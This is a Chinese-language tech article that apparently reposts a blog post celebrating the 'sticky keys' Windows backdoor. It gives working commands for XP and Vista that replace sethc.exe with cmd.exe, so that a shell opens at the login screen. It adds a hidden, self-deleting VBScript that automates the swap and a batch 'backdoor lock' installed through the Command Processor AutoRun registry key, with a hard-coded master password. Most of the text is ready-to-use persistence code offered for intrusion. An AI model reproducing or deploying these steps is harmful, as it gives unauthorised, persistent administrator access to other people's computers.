回顾曾经酷的Windows后门入侵
创始人
2024-07-14 09:51:45
0

此文章主要讲述的是变态入侵之有史以来最酷的Windows后门,本文主要阐述了有关Windows后门的一些知识。以下就是文章的主要内容的详细描述,望大家在浏览之后会对其有更深的了解。

后门原理:

 

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

XP:

将安装源光盘弹出(或将硬盘上的安装目录改名)

cd %widnir%\system32\dllcache

ren sethc.exe *.ex~

cd %widnir%\system32

copy /y cmd.exe sethc.exe

VISTA:

takeown /f c:\windows\system32\sethc.exe

cacls c:\windows\system32\sethc.exe /G administrator:F

然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

Windows后门扩展:

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)

success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)

success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)

success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)

success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)

success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.自动应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...

On Error Resume Next

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

Windows后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]

"AutoRun"="bdlock.bat"

@Echo Off

title 后门登陆验证

color a

cls

set temprandom=%RANDOM%

echo 请输入验证码:%temprandom%

set/p check=

if "%check%"=="%temprandom%%temprandom%" goto passcheck

if "%check%"=="%temprandom%" (

rem 后门服务器验证

rem 如果没有Windows后门验证服务器请rem注释掉下一行代码

if exist \192.168.8.8\backdoor$\pass goto passcheck

)

echo 验证失败

pause

exit

:passcheck

echo 验证成功

If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx

Set passcmdlock=http://blog.csdn.net/freexploit/

:allyesno

Set Errorlevel=>nul

Echo 请输入验证密码?

Set password=allyesno Is a pig>nul

Set/p password=

rem 万能密码

if "%password%"=="allyesno is a sb" goto endx

If %time:~1,1%==0 Set timechange=a

If %time:~1,1%==1 Set timechange=b

If %time:~1,1%==2 Set timechange=c

If %time:~1,1%==3 Set timechange=d

If %time:~1,1%==4 Set timechange=e

If %time:~1,1%==5 Set timechange=f

If %time:~1,1%==6 Set timechange=g

If %time:~1,1%==7 Set timechange=h

If %time:~1,1%==8 Set timechange=i

If %time:~1,1%==9 Set timechange=j

set/a sum=%time:~1,1%+%time:~1,1%

Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul

If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End

Echo 请联系客服咨询正确密码!&Goto allyesno

:End

Set password=>nul

Set Errorlevel=>nul

Echo

:endx

以上的相关内容就是对变态入侵:有史以来最酷的Windows后门的介绍,望你能有所收获。

 

相关内容

热门资讯

如何允许远程连接到MySQL数... [[277004]]【51CTO.com快译】默认情况下,MySQL服务器仅侦听来自localhos...
如何利用交换机和端口设置来管理... 在网络管理中,总是有些人让管理员头疼。下面我们就将介绍一下一个网管员利用交换机以及端口设置等来进行D...
施耐德电气数据中心整体解决方案... 近日,全球能效管理专家施耐德电气正式启动大型体验活动“能效中国行——2012卡车巡展”,作为该活动的...
Windows恶意软件20年“... 在Windows的早期年代,病毒游走于系统之间,偶尔删除文件(但被删除的文件几乎都是可恢复的),并弹...
20个非常棒的扁平设计免费资源 Apple设备的平面图标PSD免费平板UI 平板UI套件24平图标Freen平板UI套件PSD径向平...
德国电信门户网站可实时显示全球... 德国电信周三推出一个门户网站,直观地实时提供其安装在全球各地的传感器网络检测到的网络攻击状况。该网站...
着眼MAC地址,解救无法享受D... 在安装了DHCP服务器的局域网环境中,每一台工作站在上网之前,都要先从DHCP服务器那里享受到地址动...
为啥国人偏爱 Mybatis,... 关于 SQL 和 ORM 的争论,永远都不会终止,我也一直在思考这个问题。昨天又跟群里的小伙伴进行...